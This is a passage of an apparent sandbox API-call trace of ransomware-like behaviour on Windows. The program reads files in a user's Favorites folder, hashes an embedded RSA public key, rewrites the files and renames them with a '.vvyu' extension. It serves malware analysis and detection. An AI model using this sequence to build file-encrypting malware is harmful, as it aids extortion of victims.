(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.679] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.679] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.679] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.681] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.681] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.681] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.681] CloseHandle (hObject=0x584) returned 1 [0189.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0189.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.683] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\get windows live.url.vvyu")) returned 1 [0189.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.685] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.689] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79992090, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0189.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.689] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0189.689] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.693] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.693] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.695] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.695] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.697] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.697] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.697] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.698] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.698] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.698] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.698] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.698] GetLastError () returned 0x0 [0189.699] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.699] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.699] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.699] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.699] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.699] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39330 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39378 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.700] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0189.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0189.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a30 [0189.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39a18 [0189.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0189.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.703] GetCurrentThreadId () returned 0x264 [0189.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43ee0 [0189.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.704] GetCurrentThreadId () returned 0x264 [0189.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0189.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a30 [0189.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a90 [0189.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39aa8 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a48 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a18 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 